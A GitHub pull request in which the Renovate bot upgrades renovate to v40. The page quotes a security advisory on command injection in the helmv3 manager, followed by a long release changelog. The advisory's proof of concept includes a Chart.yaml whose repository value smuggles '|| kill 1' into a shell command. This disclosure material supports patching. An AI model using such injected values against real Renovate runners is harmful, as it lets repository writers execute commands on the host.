Skip to content

chore(deps): update dependency renovate to v40 [security]#209

Open
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/npm-renovate-vulnerability
Open

chore(deps): update dependency renovate to v40 [security]#209
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/npm-renovate-vulnerability

Conversation

@renovate
Copy link
Copy Markdown
Contributor

@renovate renovate bot commented Jan 13, 2026
edited
Loading

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Change Age Confidence
renovate (source) 32.17.140.33.0 age confidence

GitHub Vulnerability Alerts

GHSA-3f44-xw83-3pmg

Summary

The user-provided string repository in the helmv3 manager is appended to the helm registry login command without proper sanitization.

Details

Adversaries can provide a maliciously crafted Chart.yaml in conjunctions with a tweaked Renovate configuration file to trick Renovate to execute arbitrary code.
The value for both uses of the repository variable in lib/modules/manager/helmv3/common.ts are not being escaped using the quote function from the shlex package.
This lack of proper sanitization has been present in the product since version 31.51.0 (renovatebot/renovate@f372a68), released on January 24 of 2022.

PoC

  1. Create a git repo with the following content:

renovate.json5:

{
  $schema: "https://docs.renovatebot.com/renovate-schema.json",
  customDatasources: {
    always: {
      defaultRegistryUrlTemplate: "https://docs.renovatebot.com/search/search_index.json",
      transformTemplates: ['{"releases":[{"version":"99999.0.0"}]}'],
    },
  },
  // Register any credentials to make the manager attempt to use basic auth for the Helm registry
  hostRules: [
    {
      matchHost: "charts.bitnami.com",
      username: "un",
      password: "pw",
    },
  ],
  packageRules: [
    {
      // Target of the day
      matchManagers: ["helmv3"],
      // Don't consult the actual bitnami repo
      registryUrls: [],
      // But still, trick the manager in believing there's a new version
      overrideDatasource: "custom.always",
    },
  ],
}

Chart.yaml:

apiVersion: v2
name: renovate-aci-1
version: 0.0.1
dependencies:
  - name: redis
    version: 0.1.0
    repository: oci://charts.bitnami.com/bitnami || kill 1

Chart.lock:

dependencies:
- name: redis
  repository: oci://charts.bitnami.com/bitnami
  1. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting "Repository finished", because the ACI vulnerability allowed for execution of kill 1, terminating the root process of the container.

Note

This specific proof of concept was made a lot simpler with the introduction of the overrideDatasource configuration since version 38.120.0 (renovatebot/renovate@a70a6a3), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual Helm registry on the malformed repository URL.

Impact

This is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.

Severity
  • CVSS Score: 6.7 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Release Notes

renovatebot/renovate (renovate)

v40.33.0

Compare Source

Features
Bug Fixes
Documentation
  • faq: add explanation of differences between depName and packageName (#​36063) (06d0e7c)
Miscellaneous Chores
  • deps: update otel/opentelemetry-collector-contrib docker tag to v0.127.0 (main) (#​36183) (c3a6a73)

v40.32.7

Compare Source

Bug Fixes

v40.32.6

Compare Source

Build System

v40.32.5

Compare Source

Build System

v40.32.4

Compare Source

Build System

v40.32.3

Compare Source

Miscellaneous Chores
Build System

v40.32.2

Compare Source

Build System

v40.32.1

Compare Source

Bug Fixes
Build System

v40.32.0

Compare Source

Features
Bug Fixes

v40.31.1

Compare Source

Bug Fixes
Documentation
Miscellaneous Chores
Build System
  • deps: update opentelemetry-js monorepo to v0.201.1 (main) (#​36155) (84c32c7)

v40.31.0

Compare Source

Features
Miscellaneous Chores
  • deps: update dependency markdownlint-cli2 to v0.18.1 (main) (#​36003) (7aeef48)

v40.30.2

Compare Source

Bug Fixes

v40.30.1

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.70.5 (main) (#​36134) (f33ff65)
Miscellaneous Chores
  • deps: update dependency eslint-import-resolver-typescript to v4.3.5 (main) (#​36131) (b55efa9)
  • deps: update ghcr.io/containerbase/devcontainer docker tag to v13.8.31 (main) (#​36133) (a42de8f)

v40.30.0

Compare Source

Features
Documentation
Miscellaneous Chores

v40.29.1

Compare Source

Bug Fixes

v40.29.0

Compare Source

Features
  • cache: Experimental env var to disable HTTP memory cache (#​36124) (f478e1d)

v40.28.0

Compare Source

Features

v40.27.1

Compare Source

Bug Fixes
  • manager/fleet: Make name optional for target customizations in FleetFile schema (#​36085) (90d8b7d)

v40.27.0

Compare Source

Features
Documentation
  • aws-eks-addon: add configuration snippet for sane commit/pr mes… (#​36111) (279ac5f)

v40.26.3

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.70.4 (main) (#​36120) (2673514)

v40.26.2

Compare Source

Documentation
Miscellaneous Chores
Build System
  • deps: update dependency semantic-release to v24.2.4 (main) (#​36116) (7ff2d41)

v40.26.1

Compare Source

Bug Fixes

v40.26.0

Compare Source

Features
Miscellaneous Chores

v40.25.2

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.70.3 (main) (#​36100) (1dffa07)

v40.25.1

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.70.2 (main) (#​36099) (3e58761)
Miscellaneous Chores

v40.25.0

Compare Source

Features
  • terraform: add support for docker_registry_image data source (#​35537) (6ba08ec)
Miscellaneous Chores

v40.24.3

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.70.1 (main) (#​36094) (dfa58c8)

v40.24.2

Compare Source

Miscellaneous Chores
Build System

v40.24.1

Compare Source

Build System

v40.24.0

Compare Source

Features
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.70.0 (main) (#​36089) (c490cca)
Miscellaneous Chores

v40.23.2

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.69.1 (main) (#​36087) (26c1550)

v40.23.1

Compare Source

Miscellaneous Chores
  • deps: update dependency typescript-eslint to v8.32.1 (main) (#​36029) (c08f724)
Build System

v40.23.0

Compare Source

Features

v40.22.1

Compare Source

Bug Fixes
Miscellaneous Chores

v40.22.0

Compare Source

Features
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.69.0 (main) (#​36079) (937260d)
Miscellaneous Chores

v40.21.7

Compare Source

Bug Fixes
  • gradle: include registryType and content during registry deduplication (#​36071) (5d4ae53)

v40.21.6

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.68.3 (main) (#​36074) (a43b702)

v40.21.5

Compare Source

Build System

v40.21.4

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.68.2 (main) (#​36068) (f6d0e88)
Miscellaneous Chores
  • deps: update docker/dockerfile docker tag to v1.16.0 (main) (#​36067) (ba6dd3e)
Build System

v40.21.3

Compare Source

Bug Fixes

v40.21.2

Compare Source

Bug Fixes

v40.21.1

Compare Source

Bug Fixes
Miscellaneous Chores

v40.21.0

Compare Source

Features
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.68.1 (main) (#​36055) (2f9efcd)

v40.20.0

Compare Source

Features
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.67.0 (main) (#​36053) (388d318)
Miscellaneous Chores
  • deps: update ghcr.io/containerbase/devcontainer docker tag to v13.8.29 (main) (#​36051) (f22dfb3)

v40.19.2

Compare Source

Bug Fixes
  • manager/npm): Revert "fix(manager/npm: search for npmrc in the root directory" (#​36049) (0d7255e)
Miscellaneous Chores

v40.19.1

Compare Source

Bug Fixes

v40.19.0

Compare Source

Features
Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.66.2 (main) (#​36041) (601ec93)
Miscellaneous Chores
  • deps: update containerbase/internal-tools action to v3.10.39 (main) (#​36039) (b51aae9)
  • deps: update ghcr.io/containerbase/devcontainer docker tag to v13.8.28 (main) (#​36038) (7d56785)

v40.18.3

Compare Source

Bug Fixes

v40.18.2

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.66.1 (main) (#​36037) (5190613)

v40.18.1

Compare Source

Build System
  • deps: update dependency openpgp to v6.1.1 [security] (main) (#​36033) (7b4a15b)

v40.18.0

Compare Source

Features
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.66.0 (main) (#​36031) (61b7887)

v40.17.1

Compare Source

Build System

v40.17.0

Compare Source

Features

v40.16.0

Compare Source

Features

v40.15.0

Compare Source

Features
  • cache: Use repository cache instead of memory cache for GitHub presets (#​35999) (74a3fcb)
Documentation
Miscellaneous Chores

v40.14.6

Compare Source

Bug Fixes

v40.14.5

Compare Source

Build System

v40.14.4

Compare Source

Bug Fixes
Documentation
Miscellaneous Chores
  • deps: update containerbase/internal-tools action to v3.10.36 (main) (#​36001) (9da2ec0)

v40.14.3

Compare Source

Bug Fixes

v40.14.2

Compare Source

Bug Fixes
Code Refactoring

v40.14.1

Compare Source

Bug Fixes
  • manager/terraform: support subpath module for git-tags ref (#​35978) (c841ea1)
Miscellaneous Chores
  • deps: update prom/prometheus docker tag to v3.4.0 (main) (#​35992) (d7d9b4b)

v40.14.0

Compare Source

Features

v40.13.1

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.65.1 (main) (#​35990) (941ea58)
Miscellaneous Chores

v40.13.0

Compare Source

Features
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.65.0 (main) (#​35971) (bb3b1fb)

v40.12.4

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.64.16 (main) (#​35970) (a496bd3)

v40.12.3

Compare Source

Miscellaneous Chores
  • deps: update codecov/codecov-action action to v5.4.3 (main) (#​35968) (b7cc7d6)
Build System

v40.12.2

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.64.15 (main) (#​35966) (a4c0609)
Miscellaneous Chores
  • deps: update ghcr.io/containerbase/devcontainer docker tag to v13.8.27 (main) (#​35967) (0aa05ba)

v40.12.1

Compare Source

Build System

v40.12.0

Compare Source

Features
Bug Fixes
  • datasource/docker: ignore unknown sub-manifests in OciImageIndexManifest (#​35950) (d8fdc4f)
Documentation
Miscellaneous Chores

v40.11.19

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.64.14 (main) (#​35952) (214d758)
Miscellaneous Chores
Build System

v40.11.18

Compare Source

Miscellaneous Chores
Build System
  • deps: update dependency better-sqlite3 to v11.10.0 (main) (#​35943) (5610c07)

v40.11.17

Compare Source

Documentation
Build System

v40.11.16

Compare Source

Miscellaneous Chores
Build System

v40.11.15

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.64.13 (main) (#​35934) (56e8b7f)
Miscellaneous Chores
  • deps: update dependency eslint-config-prettier to v10.1.3 (main) (#​35929) (fe4abd8)

v40.11.14

Compare Source

Bug Fixes
  • deps: update ghcr.io/renovatebot/base-image docker tag to v9.64.12 (main) (#​35928) (6a65156)
Miscellaneous Chores

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot requested a review from toondaey as a code owner January 13, 2026 20:33
@renovate renovate bot added dependencies Pull requests that update a dependency file major-update labels Jan 13, 2026
@renovate renovate bot changed the title chore(deps): update dependency renovate to v40 [security] chore(deps): update dependency renovate to v40 [security] - autoclosed Mar 27, 2026
@renovate renovate bot closed this Mar 27, 2026
@renovate renovate bot deleted the renovate/npm-renovate-vulnerability branch March 27, 2026 01:29
@renovate renovate bot changed the title chore(deps): update dependency renovate to v40 [security] - autoclosed chore(deps): update dependency renovate to v40 [security] Mar 30, 2026
@renovate renovate bot reopened this Mar 30, 2026
@renovate renovate bot force-pushed the renovate/npm-renovate-vulnerability branch 2 times, most recently from 454895c to 71d33bf Compare March 30, 2026 18:02
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@toondaey toondaey Awaiting requested review from toondaey toondaey is a code owner

At least 1 approving review is required to merge this pull request.

Assignees

@toondaey toondaey

Labels

dependencies Pull requests that update a dependency file major-update

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@toondaey